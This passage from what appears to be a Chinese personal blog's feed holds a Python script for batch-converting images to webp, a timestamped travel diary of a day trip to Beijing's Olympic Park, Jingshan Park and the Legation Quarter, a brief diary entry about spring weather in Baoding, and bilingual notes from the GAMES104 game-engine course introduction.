            # 打开输入图片文件
            with Image.open(input_file) as im:
                # 保存为 webp 格式
                im.save(output_file, "webp", quality=quality)
            print(f"Converted: {input_file} => {output_file}")
        except Exception as e:
            # 捕获并报告转换异常
            print(f"Error converting file: {input_file}")
            print(str(e))

    def process_folder(folder_path):
        # 递归处理整个文件夹
        for root, dirs, files in os.walk(folder_path):
            for filename in files:
                # 检查文件后缀是否为 jpg/jpeg/png
                if any(filename.lower().endswith(ext) for ext in ['.jpg', '.jpeg', '.png']):
                    input_file = os.path.join(root, filename)
                    output_file = os.path.splitext(input_file)[0] + ".webp"
                    # 调用转换函数
                    convert_to_webp(input_file, output_file)

    if __name__ == "__main__":
        # 待转换图片所在的根目录(按需修改)
        folder_path = r"D:\XXX"
        process_folder(folder_path)

    ​为了保证网页浏览速度,我决定将博文图片全部从 jpg 格式转为体积更小的 webp 格式[1]

    这是正文

    06:57 京畿之门

    从京畿进京

    ​6 点起床,吃喝拉撒折腾完,打车去保定东,¥11.05。

    07:14 保定东站

    G6712

    ​这还是这个学期第一次坐高铁。

    07:56 北京房山

    这北京看起来也不咋地

    ​看着窗外的风景,列车逐渐离开了保定涿州界,进入了北京房山界。刚进北京境内时,窗外景色跟保定周边并没有什么差别,还是一大片农田。不过从这里开始,居民就享受着与河北居民不同的政策待遇了,保定居民恨死了🤬。

    ​这么看来北京还是有很大面积的土地没有开发的。

    08:13 北京丰台

    下车!

    ​下车!到这里其实路程还没过半。国家会议中心在北京北部鸟巢附近,北京丰台在北京西南郊,还要再倒腾一个多小时地铁,比从保定到北京还慢🫤。

    08:16 京爷吉祥

    Welcome to 保定!

    ​在车站还能看到“这么近,那么美,周末到河北”,我一直觉得这句话听起来怪怪的,有种特意给北京人说的感觉。

    08:43 地铁真挤

    提前感受社畜生活

    ​路线:丰台站——地铁 10 号线站北土城——8 号线奥林匹克公园,¥6。

    ​地铁里人挤人,站到下车也没找到个位置,腿酸死了。看着地铁上的 BOSS 招聘广告,可以看出北京是个很吸引外地人打工的地方,车里人的样貌大都没啥河北人特征。

    ​跟 77 说以后若是来北京上班就要天天享受这样的“福报”😭,77 于是说他不想来北京上班,宁愿回河北。

    09:20 交通网图

    北京城市轨道交通线网图

    ​看一看北京的地铁线路图。密密麻麻,纵横交错。相比于上海的地铁与苏州相连,广州的地铁与佛山相连,杭州的地铁与绍兴和嘉兴相连,北京还要至少再修 10 年才有机会将地铁修到保定!

    09:21 我出站了

    新奥购物中心

    ​出站!开始第一项历程——奥体公园!

    09:23 生命之树

    北京奥林匹克塔

    ​北京奥林匹克塔,曾被称作“生命之树”,位于北京市朝阳区北辰东路 15 号,为中国第六高塔,被网友称为“大钉子”,占地面积约 7000 平方米,始建于 2011 年,于 2015 年 8 月 8 日正式对外开放。

    ​北京奥林匹克塔包括塔基大厅和五个独立的塔冠,塔体由五座 186 米至 246.8 米高的独立塔组合而成,是世界上唯一一个由五个塔独立组成的观光塔,建筑总面积 18687 平方米。其中,塔冠面积 5257 平方米,塔座面积 13430 平方米。塔基大厅为覆土建筑,通过绿坡与地面自然相接。塔冠顶部则有五个独立的观景平台和功能厅[2]

    ​一出站就看到了一座高塔,可惜今天北京盛产可爱小雾霾😅。

    09:26 又一高塔

    玲珑塔

    ​“玲珑塔”位于国家体育场“鸟巢”北侧,是 2008 年北京奥运会的电视转播设施,主体采用钢结构,外饰玻璃幕墙,演播塔结构平面形式为等边三角形,共分 7 层,首层为建筑面积 1000 平方米的大厅,2 至 6 层为演播室,顶层塔楼暂定为 VIP 观光厅,整体总高度 132 米。夜幕降临,“玲珑塔”在彩色灯光交替映照下不停变换身姿,秀丽绚烂。奥林匹克多功能演播塔工程位于奥林匹克公园中心区中部,鸟巢北侧,西临中轴景观大道[3]

    ​看着像个电梯。

    09:36 这是鸟巢

    鸟巢

    ​国家体育场,又名“鸟巢”,位于北京奥林匹克公园中心区南部,为 2008 年北京奥运会的主体育场,举行了 2008 年夏季奥运会、残奥会开闭幕式、田径比赛及足球比赛决赛,以及 2022 年冬季奥运会、冬残奥会开闭幕式。

    ​体育场占地 20.4 万平方米,建筑面积 25.8 万平方米,可容纳观众 9.1 万人,其中正式座位 8 万个,临时座位 1.1 万个;由雅克 · 赫尔佐格、德梅隆、艾未未以及李兴钢等设计,由北京城建集团负责施工。体育场的形态如同孕育生命的“巢”和摇篮,寄托着人类对未来的希望。设计者们对这个场馆没有做任何多余的处理,把结构暴露在外,因而自然形成了建筑的外观[4]

    ​到了鸟巢,来跟小迷糊问个好。

    我现在应该离小迷糊挺近的
    一般近
    到鸟巢通勤一小时呢😁

    ​本来还打算在北京跟小迷糊见一面,结果小迷糊说他还拉个兼职周日还要上班……太拼了,太可怕了😱。

    09:38 这是折扇

    国家体育馆

    ​国家体育馆,别名“折扇”“冰之帆”,位于北京市朝阳区天辰东路 9 号,是奥林匹克中心区的标志性建筑之一;2008 年北京奥运会三大主场馆之一;2022 年冬奥会赛事场馆之一。

    ​2005 年 5 月 28 日,国家体育馆开工建设。2007 年 11 月 22 日,完工通过验收,总占地 6.78 公顷,总建筑面积为 80890 平方米。2018 年 8 月,为服务 2022 年冬奥会,国家体育馆初步形成改造方案。同年 12 月 28 日,国家体育馆改造工程开工。2020 年 12 月,国家体育馆改造工程正式完工,总面积约 9.8 万平方米。国家体育馆除开展群众冰雪、青少年冰雪活动外,还将冰雪产业与文化、旅游、科技进行融合[5]

    ​比起鸟巢和水立方,这个场馆似乎没什么名气😇。

    09:39 蓝水立方

    国家游泳中心

    ​国家游泳中心,别名“水立方”、“冰立方”,位于北京市朝阳区北京奥林匹克公园内(北京市朝阳区天辰东路 11 号),始建于 2003 年 12 月 24 日,于 2008 年 1 月正式竣工,2020 年 11 月 27 日,国家游泳中心冬奥会冰壶场馆改造工程通过完工验收,“水立方”变身为“冰立方”。国家游泳中心是 2008 年北京奥运会的精品场馆和 2022 年北京冬奥会的经典改造场馆,也是唯一一座由港澳台同胞、海外华侨华人捐资建设的奥运场馆[6]

    ​这个水立方还可以走进去瞅瞅,于是决定走进去瞅瞅。

    09:42 新年快乐

    欢度春节

    ​只能走到侧面的小商场,大厅进不去,只能隔着窗户看。

    ​大厅门口还摆着新年的龙模型。

    09:46 又见鸟巢

    鸟巢正面

    ​从水立方出来,看到了鸟巢的正面。

    09:54 鸟巢近景

    全是钢筋

    ​上鸟巢一次¥100!我们嫌贵,我们拒绝。远远地看一看。

    09:59 我爱成都

    大熊猫

    ​居然还能在北京看到“我爱成都”的标语。

    09:59 红衣墩墩

    中国龙!

    ​作为一个之前从未见过雪的极南方人,对于冬奥会的印象可能也就这个吉祥物吧。

    10:02 这是五环

    远处是中国考古博物馆

    ​中国考古博物馆是中国历史研究院下设的大型历史考古类博物馆。是我国第一家以考古命名的博物馆。博物馆内展品以考古发掘出土品为主,并包括珍贵古籍、档案文献等。

    ​中国考古博物馆(中国历史文化展示中心)地处北京奥林匹克公园核心区,以考古出土文物和珍贵古籍文献为依托,致力于展示与传播中国优秀传统文化,讲好中华文明源远流长和中华文化辉煌灿烂的中国故事,打造北京城市中轴线上的历史文化客厅和展示中华文明的国家窗口。正在努力成为北京城市中轴线上的历史文化客厅、新时代对外讲好中国故事的国家形象馆。2023 年 9 月 15 日,中国考古博物馆正式面向社会公众开放[7]

    ​希望在毕业前能有一段空闲时间,能够逛逛北京的各大国系博物馆开开眼界,然后就再也不来北方了😵。

    10:04 奥运圣火

    火炬

    ​看着这个火炬让我想起了小时候看奥运会开幕会的场景,现在已经好久没关注各色体育赛事了。

    10:32 会议中心

    看着不是很大

    ​国家会议中心位于鸟巢和水立方之北,是一座八层楼、近 400 米的长形建筑。2008 年奥运会期间,由击剑馆、国际广播中心组成。
    ​主新闻中心(MPC)是文字记者和摄影记者进驻的工作区,共有 1000 多个记者工作席位及硬件配套设施。国际广播中心建筑面积 14 万平方米,是奥运会历史上最大的国际广播中心,来自全世界 16000 名广播记者都在此工作。
    ​奥运之后,国家会议中心经过一年多的改造投入经营,已走过七年历程,创造了无数辉煌,这座曾经的奥运场馆正以骄人的成绩,成为中国乃至亚洲快速成长的会展业第一品牌。大量具有国际影响力的会议、展览项目陆续在国家会议中心成功举办,让这个中国会议业的旗舰场馆向世界展示了其多平台、复合型、高质量的强大综合实力,创造出了良好的经济效益和社会效益[8]

    ​这个国家会议中心看着并不是很大,还没有海峡国际会展中心大呢。

    10:43 没啥意思

    军博会 军博会 军博会 军博会
    不得劲

    ​参观军博会之前,77 还蛮激动的,说能看到战斗机坦克之类的,而我觉得会不会安检很严,会不会有不让拍照等严苛规则。

    ​结果参观了一阵感觉没啥意思啊,就是一些公司展示它们的研发产品,看着也不是很吸引人。

    控制室解决方案

    ​我觉得这个控制室解决方案仅仅是用 Unity 之类的软件写了个前端,那我也会,没啥内涵🥴。

    ​还能看到语音助手,AI 绘画之类的东西,我觉得也都是套壳,没啥所谓真正的技术。

    ​最后简单逛一逛就出来了。

    11:29 共享单车

    租房广告

    ​77 提议去吃个老北京铜锅涮肉,于是决定骑共享单车过去。不愧是北京啊连共享单车骑起来都比保定的舒服。

    ​车架前面还有个租房小传单。¥1200 / 月的《精装单间》估计是一套大房子被拆成好多间分开租,多个租户公用一个卫生间。一张床一个厕所的《主卧独卫》就要¥3400 / 月,绝😅。

    11:53 铜锅涮肉

    清真!

    ​看导航各种迷路,最后骑到了一个社区里才找到了店家。3 个人点了个 3-4 人餐,¥295。小贵但也还能接受。最后没有吃完剩了点蔬菜。

    12:00 这是糖蒜

    糖蒜

    ​我从未见过此种食物。77 说这在北方蛮常见的可以尝尝。吃起来酸酸甜甜的,但我想到这个是蒜就没怎么想吃🤧。

    12:57 朝阳社区

    有点像河南新村

    ​吃完饭,77 提议走去护国寺小吃整点老北京某臭名昭著饮料,出发!

    ​感觉进了北京的老社区,这里面住的应该都是老北京了,住宅上的牌子都有点年代感了🥴。

    12:59 北京老房

    北京老房子

    ​凡哥说这房子看上去还不如他家呢,但估计我们倾家荡产也买不起这里的房。

    13:05 奇特建筑

    奇特建筑 奇特建筑 奇特建筑
    老北京麦当劳

    ​北京居然还有唐人街……以及北京著名小吃——老北京麦当劳🤩!

    13:10 美味豆汁

    护国寺小吃

    ​到了 77 最想去的护国寺小吃店了。77 要在这里买瓶豆汁。一开始他还想买多点宿舍一人一瓶,被我拦住了🤪。

    喜提特产

    ​最后还是 77 买了两瓶带回去给舍友尝尝鲜。2 瓶豆汁¥16,看原料只有水和绿豆,无任何添加剂,非常绿色健康啊!

    13:12 民族博院

    北京中华民族博物院 北京中华民族博物院 北京中华民族博物院
    北京中华民族博物院

    ​来到了中华民族博物院门口,进一次要¥60。看上去还蛮有特色的,但我觉得还是要带从未去过北京的凡哥逛逛景山公园比较好,遂决定下次一定,在这直接打车去景山公园。

    小小榕王,可笑可笑

    ​北京这个地方居然还能种榕树,这么小一棵榕树也被称之为榕王😅!

    13:15 图腾柱子

    感觉有点东南亚风格

    ​在柱子下等车中,不愧是北京连打车都很贵,¥29.48。

    13:46 车上抓拍

    鼓楼 什刹海 南锣鼓巷 北大红楼
    就要到了!

    ​在车上抓拍一下鼓楼、什刹海、南锣鼓巷和北大红楼。

    ​越靠近景山,越堵车。最后到景山前街路口前,司机说里面太堵了不想开了把我们轰下来了😅。

    14:17 大神武门

    景山脚下

    ​成功到达故宫博物院北口。由于故宫门票太难约了,只好跟凡哥说下次一定。上个景山凑合一下,¥2。

    14:17 景山公园

    开爬!

    ​山顶上有好看的哦!

    14:25 我要上山

    富览亭

    ​富览亭。西侧第一座亭。孔雀蓝琉璃筒瓦顶,紫晶色琉璃瓦剪边,重檐圆攒尖顶。

    辑芳亭

    ​辑芳亭。西侧第二座亭。翡翠绿琉璃筒瓦顶,黄琉璃筒瓦剪边,重檐八角攒尖式。上檐重昂七踩斗拱,下檐单昂五踩斗拱,内原供五方佛之一的阿弥陀佛,为铸铜镏金佛像,被八国联军劫去。

    ​我决定按照四年前的浏览线路再走一遍。

    14:27 北面望远

    北海公园 什刹海
    北海的菊花没有开

    ​到半山腰了。看一看北海公园和什刹海。前面的不知道是什么楼看上去没有人,不给开放。

    14:30 我登顶了

    万春亭

    ​万春亭。位于景山的中峰,中峰的相对高度为 45.7 米,是北京城南北中轴线上最高和最佳的观景点[9]

    ​这个亭子居然不让进了,“北京城南北中轴线上最高和最佳的观景点”无了。

    北面人少

    南面人多

    是谁 用时光 筑造了你的梦幻

    是谁 用尘埃 模糊了你的容颜

    望一回宫阙亭台

    尽收眼底那如画的江山

    听一番晨钟暮鼓

    用心慨叹那朝代的轮转

    王侯已成背影

    有谁还在看着云起云落的变迁[10]

    国贸 CBD

    ​被可爱小雾霾淹没的中国尊与大裤衩。

    王府井

    ​还是能记得出那个钟楼是王府井。

    14:42 我要下山

    观妙亭

    ​观妙亭。东侧第二座亭。翡翠绿琉璃筒瓦顶,黄琉璃筒瓦剪边,重檐八角攒尖式。观妙亭内原供奉五方佛之一的阿閦佛,为铸铜镏金佛像,清光绪二十六年(1900 年)被八国联军劫去。

    周赏亭

    ​周赏亭。东侧第一座亭。孔雀蓝琉璃筒瓦顶,紫晶色琉璃瓦剪边,重檐圆攒尖顶。

    14:56 歪脖子树

    崇祯 GG place

    ​景山公园另一人文景观是崇祯自缢处。景山东麓,原有一株向东倾斜的低矮老槐树,这是明崇祯朱由检自缢的地方。明末,李自成起义军于 1644 年 3 月攻入北京,崇祯 3 月 19 日逃到景山,自觉有愧于祖先基业,以腰带自尽于观妙亭下的歪脖槐树之上。十年动乱期间,老槐树被当作“四旧”砍掉,1981 年在原址新移栽了一棵古槐。1996 年,公园管理处将东城区建国门内北顺城街 7 号门前一株有一百五十多年树龄的古槐移植至老槐树原处,替代了 1981 年新移植的小槐树。

    ​接下来是我最推荐的景点——崇祯皇帝上吊处!可惜这里的树和石碑都是后来重建的。解放后北京仍有不少有历史气息的东西被毁,令人惋惜😵。

    15:16 北京市花

    月季

    ​山脚下的月季。

    15:32 我要出去

    紫禁城角楼

    ​接下来计划去天安门。这一片地方交通不太好,没得地铁和共享单车,公交车只有观光车可以坐,¥50。我们嫌贵,我们拒绝。

    ​记得四年前也是这样的情况,当时为了找地铁站强行过北海公园。而 77 去过北海公园了,那就算了,遂决定从东边绕开故宫去天安门🥳。

    15:43 池子大街

    北池子大街 南池子大街
    池子大街

    ​故宫进不去,只得东边绕开故宫,还走了好久,皇帝的房子还是大。

    ​我觉得住在这里的居民并不一定舒服,一天到晚周围都是闹哄哄的😖,这边离地铁站也不近。

    ​还有平价商店好评!一瓶农夫山泉¥2。

    ​期间凡哥去找了个共享单车找同学去了,剩下我跟 77。

    16:04 长安大街

    长安大道连狭斜

    ​进入东长安街,还得刷身份证,搞得紧张兮兮庄严肃穆。

    中国国家博物馆

    ​希望有一天能够约上。

    没预约!寄!

    ​印象中四年前是不需要预约就能进天安门广场的(或许也要,印象不深了),就没考虑过预约问题,于是就进不去了。

    ​离回去还早,跟 77 商量了下,好像周围的地方我俩都玩过了。最后我看了看小红书,决定坐地铁去一下东交民巷,1 号线天安门东——东单,¥3。

    ​地铁太挤了地铁太挤了地铁太挤了地铁太挤了地铁太挤了地铁太挤了😠!

    16:35 同仁医院

    著名医院

    ​印象中是个很牛逼的医院。

    16:43 东交民巷

    ​东交民巷,位于北京市东城区,建造于中国 13 世纪的元朝鼎盛时期。胡同全长 1.6 千米,从天安门广场的东路一直延伸到崇文门内大街,是老北京胡同中最长的一条。早在元大都时期,这里就是运送粮食的重要小巷,因此称之为“江米巷”。
    ​东交民巷是一个集使馆、教堂、银行、俱乐部为一体的欧式风格街区。现存建筑有法国使馆、奥匈使馆、比利时使馆、日本公使馆和使馆、意大利使馆、英国使馆等。现存建筑均保留原状,保持 20 世纪初欧美流行的折中主义风格,用清水砖砌出线脚和壁柱,采用砖拱券加外廊,木结构角檩架,铁皮坡顶。东交民巷使馆建筑群是北京仅存的 20 世纪初的西洋风格建筑群[11]

    ​这条巷子曾是签订辛丑条约的地方……使馆区离故宫这么近,大清是怎么敢一次宣战这么多国的。

    16:43 哥特教堂

    圣弥额尔天主堂 圣弥额尔天主堂 圣弥额尔天主堂
    圣弥额尔天主堂

    ​圣米厄尔教堂,又称东交民巷天主堂,位于北京市东城区东交民巷甲 13 号,是北京城区最小的天主教堂,为法国高嘉理神父创建,始建于清光绪二十七年(1901 年)。
    ​圣米厄尔教堂为哥特式风格,占地面积 2656.4 平方米,清水砖墙,内部为木结构,立面为三个尖顶钟楼,用尖券、壁柱、玫瑰窗和壁龛装饰,主体建筑为高二层,坐北朝南,东西面阔三开间,南北进深十四开间。圣米厄尔教堂正门上方为教堂主保天使圣米厄尔(大天使米迦勒)的雕像。圣米厄尔教堂造型上别具特色,是西方传教士在北京修建的最后一座天主教堂,对研究清代的天主教建筑有重要研究价值[12]

    ​基本上,都不对外开放,简单拍照打卡下。

    ​在这里找到了共享单车!好耶😍!

    16:52 使馆旧址

    比利时使馆旧址 比利时使馆旧址
    比利时使馆旧址

    ​比利时使馆旧址,位于北京市东城区崇文门西大街 9 号,始建于清光绪年间,现为紫金宾馆。

    ​比利时使馆旧址现存五栋建筑,主楼为英国都铎式风格,地上三层,地下一层,立面用砖作出三个城堡和雉堞组成的山花。四栋配楼对称布置,为乡村别墅式。比利时使馆旧址是帝国主义推行对华侵略的大本营之一,是带有屈辱印记的半封建半殖民地时期的建筑,它时刻提醒着人们要牢记历史的教训,同时也为历史研究提供了重要的实物资料[13]

    ​比利时使馆旧址。

    法国使馆旧址

    ​法国使馆旧址,位于北京市东城区东交民巷 15 号,原为纯公府,清咸丰十一年(1861 年)改建为法国使馆。

    ​法国使馆旧址现存中央喷水池、大门和 4 栋配楼,大门用砖做出壁柱和拱券。4 栋配楼对称排列,为法国乡村别墅式,木构两层,有木外廊,也有砖做连续券廊。法国使馆旧址是在纯公府的中式建筑基础上修葺而成的,在很大程度上保持了中式形制和体量,为研究清晚期的使馆与王府的结合建筑提供了实物参考[14]

    ​法国使馆旧址,被围墙包得严严实实。大门是军区,不敢拍。

    16:53 邮局旧址

    法国邮政局旧址

    ​法国邮政局旧址,位于北京市东城区东交民巷 19 号,清光绪二十七年(1901 年)改建为法国邮政局。
    ​法国邮政局旧址建筑主体为砖木结构,坐北朝南,四方造型,总体为单层建筑,高约 6 米,东西侧面宽约 13 米。法国邮政局旧址作为列强在京城修建最早的一批近代领事馆区建筑,在中式建筑框架下融入了诸多西方建筑特点的折中主义风格,对研究领事馆区的建筑特点提供了实物参考[15]

    ​法国邮政局旧址。

    16:55 正金银行

    中国法院博物馆

    ​正金银行旧址,位于北京市东城区正义路 4 号,始建于清宣统二年(1910 年),原为日本横滨正金银行北京支行,现为中国法院博物馆。

    ​正金银行旧址主体建筑地上两层,地下一层,西洋古典风格,砖石立面。内为木结构,用花岗石做台基、壁柱、隅石、窗套和壁龛,转角中心设三层铁皮穹顶楼。正金银行旧址是日本帝国主义对中国进行经济侵略的重要实证,有较高的历史价值[16]

    ​中国法院博物馆,亦是日本正金银行旧址。

    ​再前面有保安堵路说交通管制不让骑……

    17:08 西长安街

    ​77 提议骑共享单车去西单解决一下晚饭问题。有了共享单车就可以骑过西长安街经过天安门了!于是开冲🥳!

    我爱北京天安门,天安门上太阳升!

    ​天安门周围全是安保,盯着我们不让停车下来拍照,只好慢慢骑过去抓拍。

    伟大领袖毛主席,指引我们向前进!

    ​抓拍人民大会堂和人民英雄纪念碑。

    ​然后又骑到了新华门,不敢拍🫢。其实是允许拍摄的。

    17:12 国家剧院

    中国国家大剧院

    ​中国国家大剧院,是新“北京十六景”之一的地标性建筑,位于北京市中心天安门广场西,人民大会堂西侧,由主体建筑及南北两侧的水下长廊、地下停车场、人工湖、绿地组成。
    ​中国国家大剧院由法国建筑师保罗·安德鲁主持设计,国家大剧院外观呈半椭球形,东西方向长轴长度为 212.20 米,南北方向短轴长度为 143.64 米,建筑物高度为 46.285 米,占地 11.89 万平方米,总建筑面积约 16.5 万平方米,其中主体建筑 10.5 万平方米,地下附属设施 6 万平方米,总造价 30.67 亿元。设有歌剧院、音乐厅、戏剧场以及艺术展厅、餐厅、音像商店等配套设施[17]

    ​国家大剧院。看上去就一蛋🤨……

    17:30 沙县小吃

    沙县国际大酒楼

    ​终于骑到了西单。看一看西单里的沙县国际大酒楼,价格感人😅……

    17:54 南昌罐汤

    鸡蛋肉饼汤

    ​在西单大悦城解决晚饭问题。由于我中午吃得太好导致晚上都不怎么想吃东西,于是就要了一碗瓦罐汤,¥10。77 要了一碗赣面¥19,他说这玩意太辣了😶‍🌫️,我这个福建人是怎么推荐这玩意的。

    18:43 安河桥北

    让我再看你一眼 从南到北

    ​北京之行就要结束了!乘地铁 4 号线西单——北京西站,¥3。

    ​地铁出来进北京西站免安检,还挺令我意外,印象中铁路的安检级别是比地铁要高的🤔。

    20:29 人真是多

    候车室

    ​啊,河北保定,我又要回来了😭!

    ​最后还是有惊无险地赶在 22:30 前到宿舍,洗上了澡。

    ​然后就是品尝豆汁时间!一股酸酸臭臭的口感,得到了宿舍的一致差评!什么玩意!真不是给人喝的😅!

    参考文献


    1. Python 把图片转换为 webp (xpdbk.com) ↩︎

    2. 北京奥林匹克塔_百度百科 (baidu.com) ↩︎

    3. 北京奥运会玲珑塔_百度百科 (baidu.com) ↩︎

    4. 国家体育场_百度百科 (baidu.com) ↩︎

    5. 国家体育馆(北京大型体育运动场馆)_百度百科 (baidu.com) ↩︎

    6. 国家游泳中心_百度百科 (baidu.com) ↩︎

    7. 中国考古博物馆_百度百科 (baidu.com) ↩︎

    8. 国家会议中心_百度百科 (baidu.com) ↩︎

    9. 景山公园(中国 4A 级旅游景区)_百度百科 (baidu.com) ↩︎

    10. 大故宫(阎崇年系列节目《大故宫》同名主题曲)_百度百科 (baidu.com) ↩︎

    11. 东交民巷(北京市文物保护街区)_百度百科 (baidu.com) ↩︎

    12. 圣米厄尔教堂_百度百科 (baidu.com) ↩︎

    13. 比利时使馆旧址_百度百科 (baidu.com) ↩︎

    14. 法国使馆旧址_百度百科 (baidu.com) ↩︎

    15. 法国邮政局旧址_百度百科 (baidu.com) ↩︎

    16. 正金银行旧址(北京市第五批全国重点文物保护单位)_百度百科 (baidu.com) ↩︎

    17. 中国国家大剧院_百度百科 (baidu.com) ↩︎

    ]]>
    @@ -2006,7 +2006,7 @@ /posts/Diary-16-%E7%83%AD%E7%83%AD%E7%83%AD%EF%BC%81/
    + 前言

    热热热!

    ​我觉着这段时间,保定是比福州要热的,从网上爬个数据比较下。

    气温

    ​感觉华北热得早,最高温更高,但是昼夜温差更大些。

    正文

    5.6

    月季 月季 月季
    粉月季与红月季

    ​ 食堂门口的月季开花了!

    5.9

    Electronics yyds!

    ​毕业季校招开始了,居然能看到 MDPI 的校招……工资看上去还不错,看样子这个公司收了不少版面费😅。

    5.11

    未来石

    ​从东湖公园望向未来石,蓝白绿的三色调,是夏天的气息。

    关汉卿大剧院

    ​雾霾也开始逐渐减少了!

    嘎嘎嘎

    嘎嘎嘎 嘎嘎嘎 嘎嘎嘎

    ​东湖里又有了游弋的大白鹅,数一数,一二三四五六七,跟当年协和里一个数。

    ​不知道这群鹅冬天是怎么过来的。

    B

    ​“I❤BD”的招牌只剩下了个 B😅……

    5.12

    中央空调已试运行,哪个实验室空调不好使可以报一下。

    ​实验室终于开启了空调……但我觉得开的太小了还是不够舒服,晚上更是直接断电了。

    5.16

    白月季

    ​白色的月季也盛开了!

    5.19

    ]]>
    @@ -2060,7 +2060,7 @@ /posts/GAMES104-Basic%20Elements/ - 资源

    课程

    第一节:游戏引擎导论

    OVERVIEW OF GAME ENGINE

    Game: Miracle of Modern computer Technology

    ​游戏:现代计算机技术的奇迹

    Game Engine: The Diamond on the crown

    ​游戏引擎:皇冠上的钻石

    ​游戏引擎中所涉及的技术太多了。

    Topic 1: WHY WE NEED TO LEARN

    Game Engine is the Foundation of Virtual World

    ​游戏引擎是虚拟世界的基础

    游戏引擎除了做游戏,还可以干这些事情:

    • METAHUMAN

      拟人

    • CINEMATIC & ANIMATION

      电影与动画

    • SIMULATION

      模拟(军事)

    • DIGITAL TWIN

      数字孪生

    Topic 2: HISTORY OF GAME ENGINE

    Early Age of Video Games

    png

    ​早期游戏:红白机,超级马里奥,坦克大战,魂斗罗。

    Father of Game Engine

    png

    • John carmack

    John conceived and executed a new way of organizing the components of computer games by separating execution of core functionality by the game engine from the creative assets that filled the play space and content of a specific game title.

    ​约翰构思并实施了一种组织计算机游戏组件的新方法,将游戏引擎执行的核心功能与填充特定游戏标题的游戏空间和内容的创意资产分开。

    ​这个人被称之为游戏引擎之父,让不同游戏间代码可以互用。

    • Wolfenstein 3D (1992)

    “Father of 3D shooters” and first demonstration of game engine application

    ​“3D 射击之父”暨游戏引擎应用首次演示

    • Doom

    png

    Along with its predecessor Wolfenstein 3D, Doom defined the FPS genre and inspired numerous similar games, often called the Doom clones. It was the first online distribution game, and it pioneered technologies including 3D graphics, networked multiplayer gaming, and support for custom modifications via packaged WAD files.

    ​与其前身《德军总部 3D》一起,《毁灭战士》定义了 FPS 类型,并启发了许多类似的游戏,通常被称为《毁灭战士》克隆游戏。它是第一款在线发行游戏,它开创了包括 3D 图形、网络多人游戏以及通过打包的 WAD 文件进行自定义修改的支持等技术。

    • Engine License

    In 1994, ID Software licensed the Doom engine to Raven, which built a successful game, ShadowCaster, based on it.

    ​1994 年,ID Software 将 Doom 引擎授权给 Raven,Raven 基于它打造了一款成功的游戏 ShadowCaster。

    Early Age of Modern Game Engine

    png

    • Quake

    • Unlike the Doom Engine, the Quake engine offered full real-time 3D rendering and supported early 3D acceleration through OpenGL.

      与 Doom 引擎不同,Quake 引擎提供完整的实时 3D 渲染,并通过 OpenGL 支持早期 3D 加速。

    png

    A game engine is a software framework primarily designed for the development of video games, which normally includes relevant libraries and support programs

    ​游戏引擎是主要为视频游戏开发而设计的软件框架,通常包括相关的库和支持程序。

    Family of Game Engines

    png

    游戏引擎有三大类:

    • Commercial Engine

      商用引擎

    • In-house Engine

      内部引擎(寒霜等,不公开)

    • Free Engine

      免费引擎

    Middleware of Game Engine

    png

    ​游戏引擎中可能用到的框架,用于解决某些特定问题。

    Topic 3: WHAT IS GAME ENGINE

    What’s Game Engine?

    ​A game engine is a software framework primarily designed for the development of video games, and generally includes relevant libraries and support programs. The “engine” terminology is similar to the term “software engine” used in the software industry.
    ​Game engine can also refer to the development software utilizing this framework, typically offering a suite of tools and features for developing games.
    ​Developers can use game engines to construct games for video game consoles and other types of computers. The core functionality typically provided by a game engine may include a rendering engine (“renderer”) for 2D or 3D graphics, a physics engine or collision detection (and collision response), sound, scripting, animation, artificial intelligence, networking, streaming, memory management, threading, localization support, scene graph, and video support for cinematics. Game engine implementers often economize on the process of game development by reusing/adapting, in large part, the same game engine to produce different games or to aid in porting games to multiple platforms.

    ​游戏引擎是主要为视频游戏开发而设计的软件框架,一般包括相关的库和支持程序。“引擎”术语类似于软件行业中使用的术语“软件引擎”。
    ​游戏引擎也可以指利用该框架的开发软件,通常提供一套用于开发游戏的工具和功能。
    ​开发人员可以使用游戏引擎为视频游戏机和其他类型的计算机构建游戏。游戏引擎通常提供的核心功能可能包括用于 2D 或 3D 图形的渲染引擎(“渲染器”)、物理引擎或碰撞检测(和碰撞响应)、声音、脚本、动画、人工智能、网络、流媒体、内存管理、线程、本地化支持、场景图和电影视频支持。游戏引擎实现者通常通过在很大程度上重用/改编相同的游戏引擎来制作不同的游戏或帮助将游戏移植到多个平台,从而节省游戏开发的过程。

    ​Wiki 里对游戏引擎的解释十分复杂。

    Our Definition: What’s Game Engine?

    • Technology foundation of the Matrix

      黑客帝国的技术基础

    • Productivity tools of creation

      创造的生产力工具

    • The Art of complexity

      复杂性的艺术

    Infinite Details of the World

    ​天地有大美而不言

    Complexity of Simulation by 0/1

    png

    ​用计算机的 0 和 1 表示这些东西,太难了

    Game Engine is Far Beyond Rendering

    png

    ​渲染只是游戏引擎中的一小部分。

    God with Limited Power in Realtime

    ​上帝所创造的真实世界拥有无尽的算力。计算机所创造的世界受算力影响,需要在 1/帧率 时间内完成计算,因此优化是一个大问题。

    Toolchain for Creators

    png

    ​给创造者的工具——游戏引擎。

    Developer Platform

    • For Programmer

      对于程序员

      • Expandable API interfaces allow programmers to define various kinds of gameplay without changing the core.

        可扩展的 APl 接口允许程序员在不改变核心的情况下定义各种游戏玩法。

    • For Studio

      对于工作室

      • Collaborate hundreds of developers with different work streams smoothly together.

        数百名具有不同工作流程的开发人员顺利协作。

    Update the Engine in the Air

    ​游戏引擎更新的过程中要保证兼容性,相当于在飞行过程中更换飞机零件。

    Yes, We Are…

    ​是的,我们是…

    The Creator and Operator of This Ugly Monster.

    ​这个丑陋怪物的创造者和操纵者。

    But Future Will be Even More Difficult.

    ​但未来会更加困难。

    Topic 4: HOW TO STUDY

    Game Engine Technology Covers All Major Area of Computer Science

    ​游戏引擎技术涵盖计算机科学的所有主要领域。

    png

    ​多读书多看报。

    Focus on the Main Road by Building the Framework

    ​游戏引擎领域范围太广了,课程只按主路进行。

    Topic 5: COURSE CONTENT

    Basic Elements

    png

    • Engine structure and layers

      引擎结构和层数

    • Data organization and management

      数据组织和管理

    png

    Rendering

    png

    • Model, material, shader, texture
    • Light and shadow
    • Render pipeline
    • Sky, terrain, etc

    Animation

    png

    • Basic concepts of animation

      动画的基本概念

    • Animation structure and pipeline

      动画结构和流程

    Physics

    png

    • Basic concepts of Physics System

      物理系统的基本概念

    • Gameplay applications

      游戏应用程序

    • Performance optimization

      性能优化

    Gameplay

    png

    • Event System

      事件系统

    • Scripts System

      脚本系统

    • Graph Driven

      图驱动(蓝图)

    Misc. Systems

    ​杂项系统

    png

    • Effects

    • Navigation

    • Camera

    Toolchain

    ​工具链

    png

